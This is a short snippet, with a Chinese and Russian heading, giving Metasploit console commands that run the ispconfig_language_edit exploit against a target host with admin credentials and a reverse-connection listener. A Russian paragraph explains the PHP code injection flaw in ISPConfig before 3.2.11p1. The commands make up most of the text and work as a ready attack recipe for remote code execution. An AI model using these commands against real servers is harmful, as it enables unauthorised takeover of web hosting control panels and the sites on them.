
Metasploit 模块
Модуль Metasploit

use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
Уязвимость была обнаружена в ISPConfig до версии 3.2.11p1. Внедрение PHP-кода может быть выполнено в редакторе языковых файлов администратором, если включена опция admin_allow_langedit.